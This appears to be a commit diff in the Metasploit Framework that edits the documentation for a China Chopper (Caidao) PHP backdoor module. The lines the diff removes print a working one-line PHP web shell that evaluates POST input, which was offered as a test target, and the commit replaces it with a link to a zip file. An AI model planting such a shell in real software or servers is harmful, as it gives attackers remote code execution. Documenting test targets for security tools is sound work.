Linked the zip file

bug/bundler_fix
Jay Turla 2016-08-23 00:33:04 +08:00 committed by GitHub
parent 139d431230
commit 1065b4cfe2
1 changed files with 1 additions and 5 deletions

View File

@ -2,11 +2,7 @@ China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye
## Vulnerable Application
Here is the PHP code of the backdoor that you can use and save it as caidao.php:
```
<?php @eval($_POST["chopper"]);?>
```
Here is the [PHP code](https://github.com/rapid7/metasploit-framework/files/430643/caidao.zip) of the backdoor that you can use and save it as caidao.php.
## Verification Steps